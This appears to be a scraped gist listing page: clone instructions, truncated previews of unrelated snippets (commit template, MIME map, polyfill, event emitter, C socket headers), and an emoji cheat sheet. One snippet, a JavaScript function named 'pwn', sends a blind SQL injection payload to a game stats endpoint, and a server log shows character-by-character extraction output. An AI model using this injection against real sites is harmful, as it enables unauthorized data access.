- Create or find a gist that you own.
- Clone your gist (replace
<hash>with your gist's hash):# with ssh git clone [email protected]:<hash>.git mygist # with https
git clone https://gist.github.com/.git mygist
| # <type>: <subject> | |
| # Using a Maximum Of 50 Characters ------------->| | |
| # Try To Limit Each Line to a Maximum Of 72 Characters --------------->| | |
| # Explain how the commit addresses the issue | |
| # ^-- NOTE: The line above is emptied by intended | |
| # Enter commit message below | |
| # --- COMMIT END --- |
| { | |
| ".123" : "application/vnd.lotus-1-2-3", | |
| ".3dml" : "text/vnd.in3d.3dml", | |
| ".3g2" : "video/3gpp2", | |
| ".3gp" : "video/3gpp", | |
| ".a" : "application/octet-stream", | |
| ".aab" : "application/x-authorware-bin", | |
| ".aac" : "audio/x-aac", | |
| ".aam" : "application/x-authorware-map", | |
| ".aas" : "application/x-authorware-seg", |
| function pwn(params){ | |
| var http = new XMLHttpRequest(); | |
| var url = "/game/stats.php?action=psolve"; | |
| http.open("POST", url, false); | |
| http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); | |
| http.send("action=showpsolve&problem_no="+params+"-- -"); | |
| if(http.response.indexOf("you wanna be first") == -1){ return true; } | |
| else return false; | |
| } |
| // As seen on http://www.di.uniba.it/~reti/LabProRete/Interazione(TCP)Client-Server_Portabile.pdf | |
| #if defined WIN32 | |
| #include <winsock.h> | |
| #else | |
| #define closesocket close | |
| #include <sys/socket.h> | |
| #include <arpa/inet.h> | |
| #include <unistd.h> | |
| #endif | |
| #include <stdio.h> |
| if (!document.querySelectorAll) { | |
| document.querySelectorAll = function (selectors) { | |
| var style = document.createElement('style'), elements = [], element; | |
| document.documentElement.firstChild.appendChild(style); | |
| document._qsa = []; | |
| style.styleSheet.cssText = selectors + '{x-qsa:expression(document._qsa && document._qsa.push(this))}'; | |
| window.scrollBy(0, 0); | |
| style.parentNode.removeChild(style); |
| class EventEmitter { | |
| constructor() { | |
| this.target = new EventTarget(); | |
| } | |
| on(eventName, listener) { | |
| return this.target.addEventListener(eventName, listener); | |
| } | |
| once(eventName, listener) { | |
| return this.target.addEventListener(eventName, listener, { once: true }); | |
| } |
| [+] Server is listening on 5001 | |
| ...pre-payoad: | |
| ...post-payoad: | |
| ...pre-payoad: d | |
| ...post-payoad: 3 | |
| ...pre-payoad: d3 | |
| ...post-payoad: d3 | |
| ...pre-payoad: d3a | |
| ...post-payoad: 0d3 | |
| ...pre-payoad: d3ad |
<hash> with your gist's hash):
# with ssh
git clone [email protected]:<hash>.git mygist
# with httpsgit clone https://gist.github.com/.git mygist
People
:bowtie: |
😄 :smile: |
😆 :laughing: |
|---|---|---|
😊 :blush: |
😃 :smiley: |
:relaxed: |
😏 :smirk: |
😍 :heart_eyes: |
😘 :kissing_heart: |
😚 :kissing_closed_eyes: |
😳 :flushed: |
😌 :relieved: |
😆 :satisfied: |
😁 :grin: |
😉 :wink: |
😜 :stuck_out_tongue_winking_eye: |
😝 :stuck_out_tongue_closed_eyes: |
😀 :grinning: |
😗 :kissing: |
😙 :kissing_smiling_eyes: |
😛 :stuck_out_tongue: |